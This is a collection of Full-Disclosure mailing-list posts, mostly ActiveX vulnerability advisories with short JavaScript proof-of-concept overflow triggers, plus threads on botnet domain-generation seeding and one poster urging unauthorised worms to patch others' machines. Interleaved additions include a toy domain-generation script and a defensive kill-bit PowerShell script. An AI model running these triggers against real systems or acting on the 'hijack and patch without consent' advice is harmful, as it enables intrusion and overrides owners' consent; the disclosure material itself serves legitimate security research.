On Thu, 19 Feb 2009 23:13:38 -0500 T Biehn  wrote:
>You know how the current amateur botnet offerings are basing
>domain lists
>off the current time to allow the 'good guys' to prepare?

>Why not base the seed off something like a news RSS feed? I asked
>some
>whitehats when I was ruined in Washington DC and they couldn't
>tell me.
>
>News isn't predictable but is globally shared on a given day.
>
>-Travis


Re: [Full-disclosure] Oh Yeah, botnet communications

2009-02-23 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


> ...stealthy infection is trickier.

but not impossible, check out the Symantec/F-Secure joint analysis of
Mebroot: https://forums.symantec.com/t5/blogs/blogprintpage/blog-id/malicious_code/article-id/244;jsessionid=A4811540934368155A4B0BEE4D0B0615.
Now that's tricky...

On Mon, 23 Feb 2009 07:56:00 -0500 "John C. A. Bambenek, GCIH,
CISSP"  wrote:
>Yes, its possible, I mapped out something on a high level that
>would
>use rss/xml and would evade most detection methods on the
>network...
>Problem comes in is that stuff gets detected at infection-time and
>gets reverse engineered. Stealthy botnets is easy, stealthy
>infection
>is trickier.
>
>On 2/19/09, T Biehn  wrote:
>> God Valdis,
>> Dont concentrate on the mundane, the core issue is the
>unpredictable nature
>> of it.
>> You have them all coordinate reading the news at 12:00 AM GMT.
>> You build some silly algorithm that ensures they pick the right
>article.
>>
>> -Travis
>>
>> On Thu, Feb 19, 2009 at 11:34 PM, 
>wrote:
>>
>>> On Thu, 19 Feb 2009 23:13:38 EST, T Biehn said:
>>>
>>> > You know how the current amateur botnet offerings are basing
>domain
>>> > lists
>>> > off the current time to allow the 'good guys' to prepare?
>>> >
>>> > Why not base the seed off something like a news RSS feed? I
>asked some
>>> > whitehats when I was ruined in Washington DC and they
>couldn't tell me.
>>>
>>> If you're the botnet owner, you need to have some way to know
>what domain
>>> name your botnet will be looking for, so you can register it.
>>>
>>> If you look at 11:06AM, see the top news story is something
>about Obama
>>> flipping the Republican party the bird, and computes the domain
>name to
>>> register based on that, but then at 11:07AM some editor at CNN
>pulls that
>>> headline and replaces it with "Obama sends obscene gesture to
>Republicans"
>>> before your bots wake up at 11:08AM and check what domain to
>use, you're
>>> screwed.
>>>
>>>
>>>
>>
>
>--
>Sent from my mobile device
>

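The two messages above argue about what should seed a bot's domain list: the date (which is why the "good guys" can prepare) or something unpredictable but shared, like the day's top headline, which Valdis objects to because an editor can rewrite the headline between the operator's lookup and the bots' wake-up. The following is an added example, not code from the thread and not any real malware's algorithm: a toy generator with both seeding choices side by side, plus the defender's side of the time-seeded case, which is simply computing next week's domains today. The TLD, label length, count per day, the hash construction and the two headlines are assumptions for illustration.

```python
# Added example, not code from the thread: a toy domain-generation routine that
# contrasts seeding from the date with seeding from a news headline.  TLD,
# label length, count and headlines are assumptions for illustration only.
import hashlib
from datetime import date, timedelta

TLD = ".info"            # assumed
DOMAINS_PER_DAY = 5      # assumed
LABEL_LENGTH = 10        # assumed


def domains_from_seed(seed, count=DOMAINS_PER_DAY):
    """Derive `count` hostnames deterministically from an arbitrary byte seed."""
    out = []
    for i in range(count):
        digest = hashlib.sha256(seed + bytes([i])).digest()
        label = "".join(chr(ord("a") + b % 26) for b in digest[:LABEL_LENGTH])
        out.append(label + TLD)
    return out


def time_seeded(day_iso):
    """The scheme Biehn calls amateur: the seed is just the calendar date
    (ISO string such as '2009-02-19'), so anyone can compute it in advance."""
    return domains_from_seed(date.fromisoformat(day_iso).isoformat().encode())


def headline_seeded(headline):
    """Biehn's proposal: the seed is the day's top headline.  Case and
    whitespace are folded, but any rewording still changes every domain."""
    normalized = " ".join(headline.lower().split())
    return domains_from_seed(normalized.encode())


def defender_precompute(start_iso, days):
    """What the date seed hands the defender: every domain the family will ask
    for over the next `days` days, computable today and ready to register or
    sinkhole before the bots wake up."""
    start = date.fromisoformat(start_iso)
    blocklist = set()
    for offset in range(days):
        blocklist.update(time_seeded((start + timedelta(days=offset)).isoformat()))
    return blocklist


def agreement(domains_a, domains_b):
    """Domains two parties (operator vs. bots) computed in common."""
    return len(set(domains_a) & set(domains_b))


if __name__ == "__main__":
    print("precomputable for the week:", sorted(defender_precompute("2009-02-19", 7))[:3], "...")
    pulled = "Obama flips Republican party the bird"           # constructed headline
    edited = "Obama sends obscene gesture to Republicans"      # constructed edit
    print("operator vs. bots after the edit:",
          agreement(headline_seeded(pulled), headline_seeded(edited)))
```

The normalization in headline_seeded() only papers over case and spacing; the structural problem Valdis raises remains, since the operator and the bots must observe byte-identical input, and an external feed gives no such guarantee.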

[Full-disclosure] Imera ImeraIEPlugin ActiveX Control Remote Code Execution

2009-03-03 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Who:
 Imera(http://www.imera.com)
 Imera TeamLinks Client(http://teamlinks.imera.com/install.html)

What:
 ImeraIEPlugin.dll
 Version 1.0.2.54
 Dated 12/02/2008
 {75CC8584-86D4-4A50-B976-AA72618322C6}
 http://teamlinks.imera.com/ImeraIEPlugin.cab

How:
 This control is used to install the Imera TeamLinks Client
package. The control fails to validate that the content it
downloads and installs is indeed the Imera TeamLinks Client software.

Exploiting this issue is quite simple, like so:








Fix:
 The vendor has been notified.

Workaround:
 Set the killbit for the affected control, see
http://support.microsoft.com/kb/240797.
Use the Java installer for TeamLinks Client or install the software
manually from: http://teamlinks.imera.com/download.html

Elazar


[Full-disclosure] Belkin BullDog Plus UPS-Service Buffer Overflow Vulnerability

2009-03-07 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Who:
Belkin International, Inc.
http://www.belkin.com

What:
Belkin BullDog Plus UPS Management Software
v4.0.2 Build 1219

UPS-Service.exe
v1.0.0.1
dated 12/19/2006

How:
The UPS management software contains a built-in web server which
allows for remote management of the UPS. The management interface
is protected by a username and password. Authentication is
performed via Basic authentication.

There is a small stack-based overflow in the base64 decoding
routine which handles the Basic authentication data.

Caveats:
The web server is not enabled by default.

Exploit:
The size of the buffer is too small for shellcode, however, this
can be stored in the GET request, which sits at esp+0x58.

Fix:
I was unable to locate any security contact information for this
vendor, so I attempted to contact their support department, which
turned out to be a waste of time.

Workaround:
As previously stated, the web server is not enabled by default.
If you do need to use it, use a firewall or OS port filtering
capabilities to restrict access.

Elazar


Re: [Full-disclosure] BBC cybercrime probe backfires

2009-03-13 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I am inclined to agree, except that you still have issues with the
electronic equivalent of breaking and entering. Case in point:
there is a good chance you would be arrested and prosecuted if you
opened the door to another person's dwelling which did not have a
lock installed, installed a lock and left him/her the key, simply
because you entered their property without permission. From an
ethics perspective, most people would judge you a good Samaritan,
since you helped someone else protect their property; however, the
law doesn't see it that way, primarily because, if you don't have
permission to be there, chances are you are not wanted there, no
matter what your intentions may be.

As far as hijacking botnets goes, one who steals from a thief may
be a thief, but one who stops one in the act is a hero. Botnets are
always "in the act"...

On Fri, 13 Mar 2009 14:00:47 -0400 T Biehn  wrote:
>More people should hijack machines and push updates to them if
>their
>users are unable or unwilling.
>
>First an Analogy:
>If someone's letting money launders use their bank account to
>launder
>money out of INACTION that's still illegal, the same SHOULD be
>true of
>people who leave their systems unpatched.
>
>These machines are negligently left open to be used in 'nefarious
>criminal activity.'
>
>Plan of Action:
>It's your civic duty to write worms, hijack botnets and patch
>machines
>with or without user consent.
>This is absolutely moral holding to the various tests (is it self
>defeating if -everyone- does it etc etc)
>Just don't get caught doing it.
>
>I'm disgusted by the imposition that you'd decry their actions for
>being illegal when they were clearly moral and represent a net
>benefit
>for society. Haven't you heard of this guy called Gandhi who
>didn't
>subscribe to the arbitrary superficial morality provided by the
>word
>of the law and only acted on what he knew to be moral?
>
>It's time to elevate yourself out of your own mind-slime and into
>2009.
>We all still have a long way to go.
>
>-Travis
>
>On Fri, Mar 13, 2009 at 9:00 AM, Castigliola, Angelo
> wrote:
>> Very unorthodox and unethical.
>>
>>
>>
>> Angelo Castigliola III
>> EISRM - Application Security Architecture
>>
>> Unum
>>
>> acastigli...@unum.com
>>
>>
>>
>> Disclaimer: The opinions expressed are my own personal opinions
>and do not
>> represent my employer's view in any way.
>>
>> 
>>
>> From: full-disclosure-boun...@lists.grok.org.uk
>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
>James
>> Matthews
>> Sent: Friday, March 13, 2009 8:10 AM
>> To: Ivan .
>> Cc: full-disclosure
>> Subject: Re: [Full-disclosure] BBC cybercrime probe backfires
>>
>>
>>
>> I agree! Why can't another people hack into computers to
>show This is
>> such BS and the BBC should be hit hard by what they did.
>>
>> On Fri, Mar 13, 2009 at 7:18 AM, Ivan . 
>wrote:
>>> The BBC hacked into 22,000 computers as part of an
>investigation into
>>> cybercrime but the move quickly backfired, with legal experts
>claiming
>>> the broadcaster broke the law and security gurus saying the
>experiment
>>> went too far.
>>>
>>>
>>> http://www.smh.com.au/news/technology/security/bbc-cybercrime-
>probe-backfires/2009/03/13/1236447465056.html
>>>
>>
>>
>>
>> --
>> http://www.astorandblack.com/
>>


Re: [Full-disclosure] BBC cybercrime probe backfires

2009-03-14 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

No, and besides, we all have a /dev/null for whatever we don't want
to listen to...

On Fri, 13 Mar 2009 17:04:48 -0400 T Biehn  wrote:
>Here's one to mull over.
>Is changing someone's mind with relentless logic tantamount to
>'breaking and entering' into their mind?
>
>-Travis
>
>On Fri, Mar 13, 2009 at 4:53 PM, Elazar Broad
> wrote:
>> I am inclined to agree, except that you still have issues with the
>> electronic equivalent of breaking and entering. Case in point,
>> there is a good chance you would be arrested and prosecuted if you
>> opened the door to another person's dwelling which did not have a
>> lock installed, and installed a lock and left him/her the key,
>> simply because you entered their property without permission. From
>> an ethics perspective, most people would judge you a good Samaritan,
>> you helped someone else protect their property, however the law
>> doesn't see it that way, primarily because of the fact that, if you
>> don't have permission to be there, chances are you are not wanted
>> there, no matter what your intentions may be.
>>
>> As far as hijacking bot nets, one who steals from a thief may be a
>> thief, but one who stops one in the act is a hero. Bot nets are
>> always "in the act"...
>>
>> On Fri, 13 Mar 2009 14:00:47 -0400 T Biehn  wrote:
>>>More people should hijack machines and push updates to them if their
>>>users are unable or unwilling.
>>>
>>>First an Analogy:
>>>If someone's letting money launderers use their bank account to launder
>>>money out of INACTION that's still illegal, the same SHOULD be true of
>>>people who leave their systems unpatched.
>>>
>>>These machines are negligently left open to be used in 'nefarious
>>>criminal activity.'
>>>
>>>Plan of Action:
>>>It's your civic duty to write worms, hijack botnets and patch machines
>>>with or without user consent.
>>>This is absolutely moral holding to the various tests (is it self
>>>defeating if -everyone- does it etc etc)
>>>Just don't get caught doing it.
>>>
>>>I'm disgusted by the imposition that you'd decry their actions for
>>>being illegal when they were clearly moral and represent a net benefit
>>>for society. Haven't you heard of this guy called Gandhi who didn't
>>>subscribe to the arbitrary superficial morality provided by the word
>>>of the law and only acted on what he knew to be moral?
>>>
>>>It's time to elevate yourself out of your own mind-slime and into
>>>2009.
>>>We all still have a long way to go.
>>>
>>>-Travis
>>>
>>>On Fri, Mar 13, 2009 at 9:00 AM, Castigliola, Angelo
>>> wrote:
>>>> Very unorthodox and unethical.
>>>>
>>>> Angelo Castigliola III
>>>> EISRM - Application Security Architecture
>>>> Unum
>>>> acastigli...@unum.com
>>>>
>>>> Disclaimer: The opinions expressed are my own personal opinions
>>>> and do not represent my employer's view in any way.
>>>>
>>>> From: full-disclosure-boun...@lists.grok.org.uk
>>>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
>>>> James Matthews
>>>> Sent: Friday, March 13, 2009 8:10 AM
>>>> To: Ivan .
>>>> Cc: full-disclosure
>>>> Subject: Re: [Full-disclosure] BBC cybercrime probe backfires
>>>>
>>>> I agree! Why can't other people hack into computers to show? This is
>>>> such BS and the BBC should be hit hard by what they did.
>>>>
>>>> On Fri, Mar 13, 2009 at 7:18 AM, Ivan .  wrote:
>>>>> The BBC hacked into 22,000 computers as part of an investigation into
>>>>> cybercrime but the move quickly backfired, with legal experts claiming
>>>>> the broadcaster broke the law and security gurus saying the experiment
>>>>> went too far.

[Full-disclosure] Autodesk IDrop ActiveX Control Heap Corruption Vulnerability

2009-04-02 Thread Elazar Broad

Who:
Autodesk
http://www.autodesk.com

What:
Autodesk IDrop ActiveX Control
http://usa.autodesk.com/adsk/servlet/index?siteID=123112&id=2753219&linkID=9240618

IDrop.ocx
version 17.1.51.160
{21E0CB95-1198-4945-A3D2-4BF804295F78}

How:
The Src, Background, PackageXml properties can be manipulated to
trigger a heap use after free condition resulting in arbitrary
remote code execution. Other properties may be vulnerable as well.

Fix:
Remove or set the killbit for the affected control, see
http://support.microsoft.com/kb/240797.

Currently, there will be NO official patch for this issue.
Autodesk's statement is as follows:

"Thank you for taking the time and effort to identify a potential
issue with our technology. We do take each and every customer or
developer issue seriously and have spent time in reviewing your
analysis of our i-drop technology. At this time, we have ceased
investment in i-drop technology. It was released over five years
ago as a means for developers to leverage their content delivery;
we’ve made no new investment in this tool and have no current plans
to update it in the near future. We’ve recorded your issue in our
tracking database and will determine its priority if/when we
determine new investment is required for this technology.

Thank You – Autodesk"

Timeline:
06/17/2008 - Vendor notified
03/31/2009 - Vendor final response
04/02/2009 - this advisory

Credit:
Elazar Broad

Re: [Full-disclosure] Stealthier Internet access

2010-05-25 Thread Elazar Broad


Thermite will definitely do, check out
http://hackaday.com/2008/09/16/how-to-thermite-based-hard-drive-anti-forensic-destruction/
and of course a .50 APIT round will do as well:
http://www.ranum.com/security/computer_security/editorials/diskcrypt/index.html

elazar

On Tue, 25 May 2010 16:08:45 -0400 valdis.kletni...@vt.edu wrote:
>On Wed, 26 May 2010 01:25:25 +0545, Bipin Gautam said:
>
>Rest of article actually looks good at first glance, but this
>jumped out at me:
>
>> > -Software disk Wiping:
>> >  Wipe KEY, header of your encrypted storage volume (first few mb, ref
>> > specific manual) Ref using Peter Gutmann standard of data wiping (35
>> > wipes)
>> > And wipe entire storage using U.S. DoD 5200.28-STD (7 wipes)
>
>There is zero evidence that anybody is able to recover data after even a
>single overwrite of /dev/zero on a disk drive made this century. Even in
>the MFM days, Gutmann's recovery technique was difficult - today's densities
>render it essentially impossible.  Even if it's possible, if your threat model
>includes the sort of organizations that could theoretically do it, maybe you
>should be considering thermite rather than software wipes. Especially if
>they're pounding on your door. ;)
>
>I'm more than open to hear of any *confirmed* cases of data recovered after
>even a single overwrite anytime after 1995.  To date, I have not seen one.
>Prove me wrong, guys. ;)


[Full-disclosure] SAPGui BI wadmxhtml.dll Tags Property Heap Corruption

2010-07-15 Thread Elazar Broad

Who
- 
SAP
http://www.sap.com

What
- 
SAPGui BI component

File:  %PROGRAMFILES%\sap\business explorer\bi\wadmxhtml.dll
Version: 7100.1.400.8
ClassID: 30DD068D-5AD9-434C-AAAC-46ABE37194EB
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
IPersist Safe:  Safe for untrusted: caller,data
KillBitSet: False

How
- 
Vulnerable Property: Tags

The Tags property can be manipulated to trigger heap corruption
resulting in the execution of arbitrary code.


Fix
- 

SAP set the kill-bit for this control with Patch 17 for SAPGui.
Alternatively, you can set the kill-bit manually, please see
http://support.microsoft.com/kb/240797.

Credit
- 
Elazar Broad
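
Both the IDrop and the SAPGui advisories above end with the same mitigation: set the kill bit per KB240797. The following is an added example, not code from Autodesk, SAP or either advisory: a PowerShell script for an elevated prompt on Windows that audits the two published CLSIDs for the registry-based safe-for-scripting/initializing categories and the kill bit, then sets the kill bit through the Compatibility Flags value KB240797 describes. The function names and the $Controls table are my own; the CLSIDs are the ones published in the advisories.

```powershell
# Added example, not code from Autodesk, SAP or the advisories above: audit
# ActiveX controls by CLSID and apply the IE kill bit using the registry layout
# described in Microsoft KB240797. Function names are my own. Run elevated.

# CLSIDs as published in the IDrop and SAPGui advisories (registry key names
# need the braces).
$Controls = [ordered]@{
    '{21E0CB95-1198-4945-A3D2-4BF804295F78}' = 'Autodesk IDrop (IDrop.ocx)'
    '{30DD068D-5AD9-434C-AAAC-46ABE37194EB}' = 'SAPGui BI (wadmxhtml.dll)'
}

# Component categories IE consults before scripting a control or initialising
# it with untrusted data (CATID_SafeForScripting, CATID_SafeForInitializing).
$CatSafeForScripting    = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
$CatSafeForInitializing = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'

# Bit 0x400 of "Compatibility Flags" is the kill bit: IE refuses to load the control.
$KillBit = 0x400

# 32-bit IE on 64-bit Windows reads the Wow6432Node view, so both views are handled.
$CompatRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-ActiveXSafety {
    # Reports registration, server DLL, the two safety categories and the kill
    # bit for one CLSID: the same fields the SAPGui advisory lists.
    param([Parameter(Mandatory)][string]$Clsid)

    $clsKey = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
    $cats   = "$clsKey\Implemented Categories"
    $info = [ordered]@{
        Clsid               = $Clsid
        Registered          = Test-Path $clsKey
        InprocServer32      = $null
        RegKeySafeForScript = Test-Path "$cats\$CatSafeForScripting"
        RegKeySafeForInit   = Test-Path "$cats\$CatSafeForInitializing"
        KillBitSet          = $false
    }
    if ($info.Registered) {
        $srv = Get-ItemProperty "$clsKey\InprocServer32" -ErrorAction SilentlyContinue
        if ($srv) { $info.InprocServer32 = $srv.'(default)' }
    }
    foreach ($root in $CompatRoots) {
        $entry = Get-ItemProperty "$root\$Clsid" -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        if ($entry -and ($entry.'Compatibility Flags' -band $KillBit)) { $info.KillBitSet = $true }
    }
    [pscustomobject]$info
}

function Set-ActiveXKillBit {
    # ORs the kill bit into "Compatibility Flags" in every applicable view so
    # other flags already set on the control are preserved.
    param([Parameter(Mandatory)][string]$Clsid)

    foreach ($root in $CompatRoots) {
        # Skip the Wow6432Node view on 32-bit Windows, where it does not exist.
        if (-not (Test-Path (Split-Path $root -Parent))) { continue }
        $key = "$root\$Clsid"
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        $entry = Get-ItemProperty $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        $current = if ($entry) { $entry.'Compatibility Flags' } else { 0 }
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Type DWord -Value ($current -bor $KillBit)
    }
}

# Audit first, then kill-bit whatever IE could still instantiate.
foreach ($clsid in $Controls.Keys) {
    $before = Get-ActiveXSafety -Clsid $clsid
    $summary = '{0}: registered={1} safeForScript={2} safeForInit={3} killbit={4}' -f `
        $Controls[$clsid], $before.Registered, $before.RegKeySafeForScript, $before.RegKeySafeForInit, $before.KillBitSet
    Write-Host $summary
    if (-not $before.KillBitSet) {
        Set-ActiveXKillBit -Clsid $clsid
        Write-Host ('  kill bit now set: {0}' -f (Get-ActiveXSafety -Clsid $clsid).KillBitSet)
    }
}
```

The audit half is useful on its own for the other controls discussed on this page: a control that is not registered reports registered=False and needs no kill bit, while one that reports safeForScript=True with killbit=False is the case the advisories describe.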


Re: [Full-disclosure] Day of bugs in WordPress 2

2010-07-29 Thread Elazar Broad

ed or nano? :)

On Thu, 29 Jul 2010 20:47:19 -0400 valdis.kletni...@vt.edu wrote:
>On Thu, 29 Jul 2010 17:18:28 PDT, Zach C said:
>> So if Drupal and WordPress, etc. are so terrible, what would you all recommend?
>
>vi or emacs. Take your pick, I'm not starting an editor war. ;)


Re: [Full-disclosure] Expired certificate

2010-08-02 Thread Elazar Broad


>Can't you? The world is full of unpatched systems. You can even find
>systems where patches are not installed because it is running a piece of
>mission critical software and they would lose support if they installed
>any patches (I am not making this up).

Spot on. I know of one large accounting/ERP system (which shall
remain nameless, though I am sure there are those out there who
have come across it) that checked the SQL version, including the
revision number at runtime, which made patching SQL impossible.

On Sun, 01 Aug 2010 15:38:46 -0400 Pavel Kankovsky
 wrote:
>On Sun, 25 Jul 2010, Dan Kaminsky wrote:
>
>> > So... no one is doing revocation checking and expiration is evil.
>> > How are we supposed to get rid of invalid certificates?
>>
>> Ask me that in a few days ;)
>
>Has one week been enough for you? :)
>
>> So nobody will sell you a name constrained certificate.  It's almost
>> like there are serious implementation issues with the extension in the
>> field.
>
>Obviously not serious enough to prevent their use by US Federal Bridge CA.
>See
>
>
>> Absolutely correct.  Whatever world X.509 is great for, it sure ain't
>> this one.
>
>Governments and big companies *are* hierarchical and bureaucratic and X.509
>was developed for them.
>
>> Patch management involves the same thing being put on different hosts,
>> and there's really no choice -- you can't run an infrastructure without
>> maintaining it, on some timescale anyway.
>
>Can't you? The world is full of unpatched systems. You can even find
>systems where patches are not installed because it is running a piece of
>mission critical software and they would lose support if they installed
>any patches (I am not making this up).
>
>> Certificate management involves different things being put on different
>> hosts, [...]
>
>This is a red herring. When you have got a bag of certificates, it is
>trivial to pick the right certificate for every host and check it
>automatically both before and after deployment. And everything else but
>the bits (place where the cert is installed, services that need to be
>restarted etc.) can stay identical.
>
>> [...] and there's totally a choice -- you can simply not have a
>> certificate at all.
>
>Yes. And you can teach your users to check all server public keys
>manually. You can also make a choice to send everything in cleartext and
>set all passwords to "123456" because it will make your life much easier.
>
>> To paraphrase another quote, "X.509 never fails, only X.509 deployers."
>
>I do not say X.509 never fails, I question
>
>> You know, it's strange.  I never hear stories about networks being taken
>> down for nonpayment of electric bills, but we have straight up UI
>> support for certificate errors.  Why do you think that is?
>
>There are various cases of epic fails related to electric bills but I
>admit I have not found a clear example affecting IT infrastructure
>directly.
>
>Replace interrupted power supply with expired domain registration and
>you'll be able to find dozens of incidents, all of them affecting IT for
>obvious reasons--and some of them involving big names like Microsoft and
>Google.
>
>--
>Pavel Kankovsky aka Peak  / Jeremiah 9:21 \
>"For death is come up into our MS Windows(tm)..." \ 21st century edition /


Re: [Full-disclosure] why not a sandbox

2009-09-06 Thread Elazar Broad

http://www.sandboxie.com/

On Fri, 04 Sep 2009 14:05:24 -0400 RandallM  wrote:
>how come we just can't sandbox the browser away from the system.
>its the users that just get gmail and click links, watch youtube vids
>and check FaceBook and MySpace that infect the network!
>
>--
>been great, thanks
>a.k.a System


Re: [Full-disclosure] What's with www.modsecurity.org

2009-09-06 Thread Elazar Broad

Works fine for me...

On Sun, 06 Sep 2009 14:23:37 -0400 David Alanis  wrote:
>Good Day,
>
>Anyone happen to know what is going on with www.modsecurity.org or
>www.breach.com?
>
>Cheers,
>David
>
>This message was sent using IMP, the Internet Messaging Program.


Re: [Full-disclosure] When is it valid to claim that a vulnerability leads to a remote attack?

2009-10-09 Thread Elazar Broad

On Fri, 09 Oct 2009 10:24:02 -0400 Paul Schmehl
 wrote:
>--On Thursday, October 08, 2009 22:16:01 -0500 Jonathan Leffler
> wrote:
>
>>
>> A reputable security defect reporting organization is claiming that a Windows
>> program is subject to a remote attack because:
>>
>> * The vulnerable program (call it 'pqrminder') is registered as the 'handler'
>> for files with a specific extension (call it '.pqr').
>> * If the user downloads a '.pqr' file (or is sent one in the mail and clicks
>> on it), then 'pqrminder' is invoked.
>> * If the file is malformed, then arbitrary code can be executed (buffer
>> overflow).
>>
>> While recognizing that there is a bug here, that does not strike me as being
>> what is normally meant by a 'remote attack'.
>
>In fact it's very typical of the types of attacks we see every day now.  By far
>the most routinely successful attacks now are initiated through some sort of
>social engineering trick that requires user interaction to trigger the
>compromise.
>
>If by remote you mean "live interaction by the hacker at the point of attack"
>(as in a "traditional" hack), then no, it's not a remote attack. I think the
>more normal understanding of remote attack (although it's usually worded
>remote compromise) is that the result of a successful attack is the opening of
>a gateway that can lead to additional compromise or complete takeover of a
>machine.  Given the details you've offered, I think this qualifies as
>"potentially leading to a remote compromise" of a machine.
>
>The attack begins when the unsuspecting user clicks on a link to either open an
>attachment or view a webpage or video.  In the background the compromise takes
>place, after which the malicious software "phones home", downloads additional
>tools, etc. until the host is completely and utterly compromised.
>
>--
>Paul Schmehl, Senior Infosec Analyst
>As if it wasn't already obvious, my opinions
>are my own and not those of my employer.
>***
>"It is as useless to argue with those who have
>renounced the use of reason as to administer
>medication to the dead." Thomas Jefferson

Think Adobe Acrobat, most of the issues had to do with file
parsing (JBIG2 comes to mind), and the drive by campaigns exploiting
the issue(s) were probably quite successful...

elazar


[Full-disclosure] Adobe Shockwave ShockwaveVersion() Stack Overflow

2007-11-08 Thread Elazar Broad
There is a stack overflow in ShockwaveVersion() function. I have not been able 
to execute code via this overflow. PoC is as follows:
---
function Check() {
  var s = "";
  while (s.length < 768 * 768) s=s+s;

  var obj = new ActiveXObject("SWCtl.SWCtl"); //{233C1507-6A77-46A4-9443-F871F945D258}

  obj.ShockwaveVersion(s);
}
---

Elazar



[Full-disclosure] Office Web Controls DataSourceControl Memory Access Violation

2007-11-12 Thread Elazar Broad
There is an un-handled memory access violation in the OWC11.DataSourceControl. 
As far as I know, I don't think it is possible to execute code via this, the 
worst it can do is crash Internet Explorer. PoC as follows:

--
function Check() {
  var obj = new ActiveXObject("OWC11.DataSourceControl");

  obj.XMLDataTarget = "A";
}
--

Elazar



[Full-disclosure] Microsoft Remote Help safrcdlg.dll Buffer Overflow

2007-11-12 Thread Elazar Broad
The GetProfileString function of the SAFRCFileDlg.RASetting control contains a 
buffer overflow. This control is NOT marked safe for scripting, and seems to 
execute in the context of the user, so I am not sure what can be done 
maliciously with this. Nevertheless, it is a buffer overflow. PoC as follows:

--
//written by e.b.
var s = "";
while (s.length < 999 * 999) s=s+s;

var obj = new ActiveXObject("SAFRCFileDlg.RASetting");

obj.GetProfileString(s);
--

Elazar




[Full-disclosure] Microsoft Forms 2.0 Controls Multiple Memory Access Violations

2007-11-12 Thread Elazar Broad
There are multiple memory access violations in the Microsoft Forms 2.0 
Controls (FM20.dll). PoC as follows:

function Check() {
  var obj;

  //Forms.Checkbox.1
  obj = new ActiveXObject("Forms.Checkbox.1");
  obj.Caption = "A";
  obj.GroupName = "A";
  obj.Accelerator = "A";

  //Forms.OptionButton.1
  obj = new ActiveXObject("Forms.OptionButton.1");
  obj.Caption = "A";
  obj.GroupName = "A";
  obj.Accelerator = "A";

  //Forms.ToggleButton.1
  obj = new ActiveXObject("Forms.ToggleButton.1");
  obj.Caption = "A";
  obj.GroupName = "A";
  obj.Accelerator = "A";

  //Forms.ComboBox.1
  obj = new ActiveXObject("Forms.ComboBox.1");
  obj.Text = "A";
  obj.Value = "A";

  //Forms.TextBox.1
  obj = new ActiveXObject("Forms.Textbox.1");
  obj.Text = "A";
  obj.Value = "A";
  obj.SelStart = 1;
}

There may be more.

Elazar



[Full-disclosure] WebEx GPCContainer Memory Access Violation

2007-11-13 Thread Elazar Broad
There is a memory access violation in the InitParam() and SetParam() functions. 
PoC as follows:

-
function Check() {
  var obj = new ActiveXObject("GpcContainer.GpcContainer.1");

  obj.InitOaram("A");
}
-

Elazar



Re: [Full-disclosure] WebEx GPCContainer Memory Access Violation

2007-11-14 Thread Elazar Broad
Typo in the original PoC. It should read as follows:

-
function Check() {
  var obj = new ActiveXObject("GpcContainer.GpcContainer.1");

  obj.InitParam("A");
}
-

Elazar



[Full-disclosure] ComponentOne FlexGrid 7.1 Light Multiple Stack Overflows

2007-11-15 Thread Elazar Broad
The ComponentOne FlexGrid 7.1 (VSFlexGrid.VSFlexGridL) has multiple stack 
overflows. I have not tested code execution nor do I remember what this 
component was installed with. PoC as follows:

function Check() {
  var s = "";

  while (s.length < 262145) s=s+s;

  var obj = new ActiveXObject("VSFlexGrid.VSFlexGridL");

  obj.Text = s;
  obj.EditSelText = s;
  obj.EditText = s;
  obj.CellFontName = s;
}

Elazar



[Full-disclosure] Multiple stack-based buffer overflows in dxmsft.dll

2007-11-19 Thread Elazar Broad
There are multiple stack overflows in dxmsft.dll version 6.3.2900.3199(Image 
DirectX Transforms). This DLL exposes DirectX Image Transform objects which are 
safe for scripting. The issue is with the Color property of certain objects, so 
I am assuming this property is inherited from a base interface.
This affects WindowsXP SP2 IE6(fully patched), I have not tested this on
IE7 and it does not appear to affect Windows Server 2003 R2 SP2(newer version 
of the dxmsft.dll). I have not tested code execution, though it may be 
possible. I received the following response from Microsoft:

---
>From our investigation this issue was found to be a stability problem which is 
>not exploitable. The net effect of this issue is that IE will become 
>unresponsive. The underlying operating system will still respond and Killing 
>the process will stop the local DoS.
---

It did not hang IE on my machine, but instead crashed IE with a stack overflow. 
This may be related to http://www.securityfocus.com/bid/19029/.

PoC as follows:

-
function Check() {
  var s = "";

  while (s.length < 99) s=s+s;

  var obj = new ActiveXObject("DXImageTransform.Microsoft.Chroma");
  obj.color = s;

  var obj = new ActiveXObject("DXImageTransform.Microsoft.DropShadow");
  obj.color = s;

  var obj = new ActiveXObject("DXImageTransform.Microsoft.Glow");
  obj.color = s;

  var obj = new ActiveXObject("DXImageTransform.Microsoft.MaskFilter");
  obj.color = s;

  var obj = new ActiveXObject("DXImageTransform.Microsoft.Shadow");
  obj.color = s;
}
-

Elazar



Re: [Full-disclosure] Multiple stack-based buffer overflows in dxmsft.dll

2007-11-19 Thread Elazar Broad
I did not see this: http://www.milw0rm.com/exploits/4251, my apologies, please 
ignore my last post...



[Full-disclosure] Aurigma ImageUploader 4.1 Multiple stack overflows

2007-11-22 Thread Elazar Broad
There are multiple stack overflows in the Aurigma ImageUploader 4.1 ActiveX 
control. I believe this control was installed by www.dotphoto.com. PoC as 
follows:

---
function Check() {
  var s = "";

  while (s.length < 99) s=s+s;

  var obj = new ActiveXObject("Aurigma.ImageUploader.4.1"); //{6E5E167B-1566-4316-B27F-0DDAB3484CF7}
  obj.GotoFolder(s);
  obj.CanGotoFolder(s);
}
---


Elazar



